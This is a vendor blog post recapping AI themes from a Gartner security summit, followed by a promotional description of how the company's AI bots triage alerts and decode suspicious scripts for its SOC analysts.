Security operations · 3 MIN READ · KIM MAHONEY · JUN 14, 2024 · TAGS: AI / MDR / SOC
I recently attended my first Gartner Security & Risk Management Summit (hooray me!). Similar to RSA Conference a few weeks ago, the sessions and conversations were all about AI and its potential uses for security teams. AI is certainly the buzzword du jour at all security conferences and it features in all the big vendor announcements lately. Now that the dust has settled, here are my thoughts:
AI evolution over revolution
What I liked most about the sessions I attended was the realistic expectations and honesty about what security teams can actually do with AI, and what they can’t. This pragmatic approach is in stark contrast to events last year, where AI was shoehorned into every session, whether it applied or not.
Of the many sessions I attended, here are a couple of my key takeaways on how AI can help SOC teams:
- In the next 12 months, the opportunities for AI will likely be more evolutionary than revolutionary. Gartner predicts that it will be another year (2025) before we can glean any real value from generative AI workflows.
- Simply employing AI is not going to replace bodies on your SOC team. In fact it may require new bodies and new skills in the form of developers. However, it can help supplement security workflows. For example, AI tools can generate the dreaded after-incident report write-ups, but of course those reports still need to be reviewed/edited by human analysts.
- There are distinct and specific use cases for both automations and AI in hyper-scaling your SOC team, depending on the problems that need solving.
- AI is not going to solve all modern SOC problems, such as resource gaps, but it can help in a couple key areas, including: improving threat detection and incident response (what Gartner calls TDIR) outcomes, helping prevent SOC team burnout, and employing threat intel lessons and continuous threat exposure management (CTEM) to enhance detection engineering.
It turns out that AI will likely not bring a total revolution to security (despite what some vendors claim). But all this talk got me thinking about how Expel MDR has already been reaping the benefits of AI and automation. Expel Workbench™, our security operations platform, employs AI-powered automations to improve our analyst experience, and utilizes external and internal threat intelligence insights to consistently enhance our detections—and it has since our inception.
How Expel uses AI and automations to improve threat detection and response outcomes
AI tools like our Josie® bot help our SOC team comb through the millions of alerts in customers’ environments each day. Josie is our ‘judge,’ determining if there’s something to an alert that warrants further investigation by our SOC team, or not, by applying our Expel-written detection rules and weeding out false positives early.
One of our customers said it best:
“Out of a million events, 99.5% of them are filtered out in triage by AI and machine learning…” -Ben Uhlig, CentroMotion
Once an alert is deemed an ‘Expel alert,’ a second bot, named Ruxie™, kicks-in to provide more context. For example, if Microsoft Defender or CrowdStrike Falcon alerts on a suspicious powershell script, Ruxie will then automatically translate the code and intent of the script (a tedious job usually reserved for analysts). This saves precious minutes, if not hours of translation time for our team. Ruxie then compares the decoded script to other attacks we’ve seen in customer environments or from external threat intelligence and known MITRE TTPs within our Global Context data lake.
If more information is required, Ruxie brings in additional context from across the customer’s environment, including correlating data from their endpoint/network environments, identity and SaaS workplace tools, and cloud workload and control plane data to find any other signals that help our analysts perform a more in-depth investigation of the alert. This greatly reduces the amount of time it takes our analysts to investigate the alert by surfacing all of the contextual information needed in Expel Workbench before they even open the investigation. Our focus on improving our analyst experience is one of the main reasons why our customers love us, and also why our SOC team has a great analyst retention rate.
It was encouraging to hear the somewhat consistent theme that AI will play a pragmatic role in the SOC at the Gartner event, and that the overstated hype of yesteryear has died down. The truth is that AI can make humans better at security operations—which is something we’ve been preaching for a while. If you’re interested in learning more about how Expel MDR uses AI to improve detection and response outcomes for customers, drop us a line.